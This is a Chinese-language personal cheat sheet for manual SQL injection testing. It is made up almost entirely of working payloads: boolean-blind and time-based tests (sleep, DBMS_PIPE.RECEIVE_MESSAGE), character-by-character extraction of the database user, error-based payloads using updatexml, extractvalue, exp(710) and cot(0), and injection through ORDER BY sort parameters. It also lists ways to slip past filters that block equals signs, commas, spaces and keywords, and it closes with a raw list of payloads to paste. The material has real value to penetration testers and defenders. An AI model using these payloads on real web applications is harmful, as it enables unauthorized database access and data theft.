SQL注入个人手工测试思路

id=1'and 1=1 or 'a'='b  此时语句应为正常id=1'and 1=2 or 'a'='b  此时语句应为不正常这里and的优先级比or高，中间1=1为true则返回true，否则返回falseid=-1'or 1=2 or 'a'='b  将前面改为-1然后用or也是可以的因为测试过程中网站返回的错误页面是各种各样的我们只需要确定1=1为一种，其他情况均和1=1返回的不同即可

ascii(substr(user(),1,1))  返回的是从第一位开始截取1位字符的ascii码id=1'and 1=ascii(substr(user(),1,1)) or 'a'='b我们遍历and后面这个1,只有相等时才会正常，就会有一条数据返回的长度不一样

用户名是r开头，匹配不到就会返回fasle，只有第一位是r才会返回trueid=1'and user() like 'a%' or 'a'='b  %表示匹配所有id=1'and user() like 'a_' or 'a'='b  _表示匹配一个

if(1=2,1,sleep(4))  相等正常，不等则延时4秒orcale中没有sleep，可以用下面这个DBMS_PIPE.RECEIVE_MESSAGE('a',4)='a' 延迟4秒

id=1'and if(114=ascii(substr(user(),1,1)),1,sleep(4)) or 'a'='b

id=1'and sleep(5*(1)) or 'a'='b 延时5秒id=1'and sleep(5*(0)) or 'a'='b 不会延时

id=1'and sleep(5*(ascii(substr(user(),1,1))=114)) or 'a'='b

如果1=1则返回1,否则返回2case when 1=1 then 1 else 2 end1=1返回1，否则返回2if(1=1,1,1)前面不为null就返回11，为null返回500IFNULL(11,500)如果相等返回为null，否则返回5NULLIF(5,10)orcale还可以使用decode函数，如果前面两个1相等则返回1，否则返回2decode(1,1,1,2)其他更多函数使用方法可以自己去看官方文档

id=1'and NULLIF(1,ascii(substr(user(),1,1))) or 'a'='b

user()、current_user()、system_user()、session_user()有的数据库则为user

过滤=号使用< > regexp like rlike Between过滤逗号union select 1,2,3union select * from ((select 1)a JOIN (select 2)b JOIN (select 3)c)%23substr(user(),1,1)等价于substr((user()) from 1 for 1) 过滤空格+ %00 %0A /**/ ()过滤or andand = &&、or = ||、xor = |、not = !还可以尝试一些编码，url、unicod、base64之类的

length(user())         返回目标长度len(user)              同lengthsubstr(str,pos,len)    从pos开始的位置截取str字符串中len长度的字符substring()            同substrmid()                  同substrright(str,length)      返回字符串str最右边的length个字符ascii(str)             返回字符串最左边字符的ASCII码值         ord(str)               同asciilpad(str1,len,str2)    如果str1大于len，返回str1左边的len个字符，否则在str1左边填充str2至lenrpad(str1,len,str2)    跟lpad同理，不过是在右边填充instr (root,r)         返回字符串root中第一次出现r的位置,从1开始position('r' in 'root')返回r在root中首次出现的位置ltrim()和rtrim()       去除字符串左侧或右侧的空格或其他指定字符。insert(str,len,x,new)  用于在指定位置插入一个子字符串，并可选择替换原有的部分字符strcmp (str1,str2)     所有的字符串均相同，返回0，若根据当前分类次序，第一个参数小于第二个，则返回-1，其它情况返回1

下面是移除abcd句首的b，但是abcd并不以b为句首开头，所以会返回abcdtrim(leading 'b' from 'abcd') 下面则会返回bcdtrim(leading 'a' from 'abcd') 那我们的注入语句为id=1'and trim(leading 'b' from user())=trim(leading 'c' from user()) or 'a'='b

insert((insert(目标字符串,1,截取的位数,'')),2,9999999,'') 这里截取的位数从0开始数只需要记住下面返回的是user的第一位insert((insert(user(),1,0,'')),2,9999999,'')注入语句为id=1'and insert((insert(user(),1,0,'')),2,9999999,'')='y' or 'a'='b

concat(str1,str2)        函数用于连续两个或多个字符串(也可以是列)，形成一个字符串group_concat(str1,str2)  连接str1，str2，如果有多行结果用逗号分割conv(str,m,n)   将str从m进制转换为n进制hex()           十六进制编码lower()         转成小写字母upper()         转成大写字母char(num)       将ASCII码转换为字符串exp(710)        计算以e为底的710次方，临界值709cot(1)          表示角度为1弧度的角的余切值，cot(0)无意义会报错power(2,99999)  计算2的99999次方UpdateXml()     用来改变文档中符合我们条件的值extractvalue()  从目标XML中返回符合我们条件的字符串greatest(n1,n2) 返回最大的值least(n1,n2,n3) 返回最小的值

select * from 表名 order by 列名或者数字(我们可控) desc一般参数为sort、order或sortname，有一个参数值为desc或asc一般测试的时候加一个特别大的数字来观察页面是否发生异常

sort=if(114=ascii(substr(user(),1,1)),id,username)

sort=case when 1=1 then id else username end
sort=case 1 when 1 then id else username end 过滤=号可以这样写sort=,case 1 when 1 then id else username end 有时候前面还需要加个逗号

sort=case 1 when 1 then id else exp(710) endsort=case 1 when 1 then id else cot(0) endsort=case 1 when 1 then id else power(2,9999) end原理就是else后面这个函数的值会特别大或者没有意义就会异常

sort=rand(1=1)sort=rand(1=2)sort=rand(114=ascii(substr(user(),1,1)))

sort=updatexml(1,concat(0x7e,(select user()),0x7e),1)0x7e是"~"符号的16进制，在这作为分隔符

id=1'||exp(710)||'id=1'||cot(0)||'id=1'||power(2,99999)||'注入思路跟上面order by差不多id=1'||case when 1=1 then power(2,99999) else 1 end||' 报错id=1'||case when 1=2 then power(2,99999) else 1 end||' 正常注user也是一个道理id=1'||case when ascii(substr(user,1,1))=17 then power(2,99999) else 1 end||'

判断'/**/or/**/DBMS_PIPE.RECEIVE_MESSAGE('a',4)='a' AnD '' like '%case/**/when/**/1=1/**/then/**/1/**/else/**/0/**/end'AND updatexml(1,concat(0x7e,(select database(),0x7e),1)--+AND if(1=1,sleep(5),1)--+'AND +'a'='a'+OR+'a'='a')and/**/1=1/**/and/**/('a'='a')/**/AND/**/('a'='b'/**/and/**/'a'='b'+or/**/'a'='a'OR 'a' in 'a' OR 'a' in 'aCASE 1 WHEN 1 THEN 1 ELSE 1 END||case+when+1=1+then+1+else+exp(1000)+end'||cot/**/(0)||''||DECODE(1,2,1,cot/**/(0))||',case+when+1=1+then+cot(0)+else+exp(800)+end数据库报错exp(710)cot(0)POW(1,1,1,)pow(1+(1=1),99999)power(9999,9999)AND+1=extractvalue(1,concat(0x7e,user(),0x7e))注数据 ord(mid(user(),1,1))=11ascii(mid(user()+from+10+for+1))=17ascii(substr(user,1,1))=17left(user,1)='T'instr(user,'A')=1用户user()  current_user()  system_user()  session_user()  user